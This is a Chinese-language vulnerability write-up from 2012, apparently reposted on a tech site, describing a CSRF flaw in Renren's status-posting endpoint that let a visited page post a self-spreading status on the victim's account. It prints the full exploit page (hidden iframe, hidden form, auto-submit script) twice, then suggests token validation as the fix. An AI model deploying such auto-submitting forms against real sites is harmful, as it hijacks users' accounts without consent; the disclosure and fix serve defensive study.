人人网CSRF漏洞曝光及修复方案
发布时间:2012-05-17 10:30:10 作者:佚名 
我要评论
我要评论CSRF(Cross-site request forgery跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通
脚本页面http://bookman.sinaapp.com/doover.php,访问该页面后会发送一条状态“已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
详细说明:
看了下那个链接的源代码,是通过人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一个参数content到接口即可。
这个页面post的content内容就是“已经结束了,这是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>爱你的说</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
数字bookman爱你。欢迎访问“肖寒Bookman”的人人空间。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.jb51.net value="1"/>
<p>raw: <input type="text" name="content" value="已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>
修复方案:
人人比我懂的多。以前有次flash的类似的,传播是站内信吧。
补漏洞很简单,加一个token验证即可。
低级错误一枚,从网不行啊。
作者 leo108 AND 白熊一枚
详细说明:
看了下那个链接的源代码,是通过人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一个参数content到接口即可。
这个页面post的content内容就是“已经结束了,这是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>爱你的说</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
数字bookman爱你。欢迎访问“肖寒Bookman”的人人空间。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.jb51.net value="1"/>
<p>raw: <input type="text" name="content" value="已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>
修复方案:
人人比我懂的多。以前有次flash的类似的,传播是站内信吧。
补漏洞很简单,加一个token验证即可。
低级错误一枚,从网不行啊。
作者 leo108 AND 白熊一枚
相关文章
人人网是一款是基于人人网主体服务的免费应用软件,专门为手机用户设计。2013-11-26
人人桌面 v4.0 中文绿色免费版 帮助用户更方便的挂人人网的工具
人人网桌面版(原校内通)是一款面对在办公室上网的白领、学生,以及人人网忠实用户的软件。具有:人人网新鲜事、好友状态实时提醒,快速回复;即时通知收到的留言、评论、2013-05-24
MAC修改还原工具是吾爱网友开发的一款能够随机修改网卡物理地址的工具,当然了修改后还能进行恢复,整个修改过程不需要重启修改,实时生效2023-08-11
拟在线用户真实互访,即挂机的用户互相随机访问人人主页,实现互访功能2012-08-31- Wordpress写个人博客的朋友越来越多同时想把写的博客文章同步到其他的社交网站上,比如人人网,接下来为大家介绍一招,感兴趣的你可以参考下哈,或许可以帮助到你2013-03-11
人人网奥运屏蔽 关键词 可以屏蔽奥运相关的关键词 不喜欢奥运的人有福
不喜欢奥运的人可以用这个软件2012-08-07
人人桌面经典版客户端是人人网推出的官方桌面版客户端,是人人网的官方增强软件。人人桌面经典版是官方提供的,适合习惯使用旧版的网友2014-07-02- 人人网简称人人,它让您更加方便的随时随地的与好友自由沟通。 在沟通的过程中,各位人人网友可千万别忘了作息时间哦,下面小编就教你开启打扰模式设置2014-08-02
- 人人网是一款很好用的社交平台软件,我们在使用人人沟通聊天时,如何屏蔽陌生人的消息呢?下面随小编一起来看下人人屏蔽陌生人消息的具体操作吧。希望此篇教程能对大家有所2014-08-02
- 我们在使用人人沟通聊天时,如何屏蔽陌生人的消息呢?这是目前很多的人喜欢问的问题,本文带来了详细的教程2014-08-04
最新评论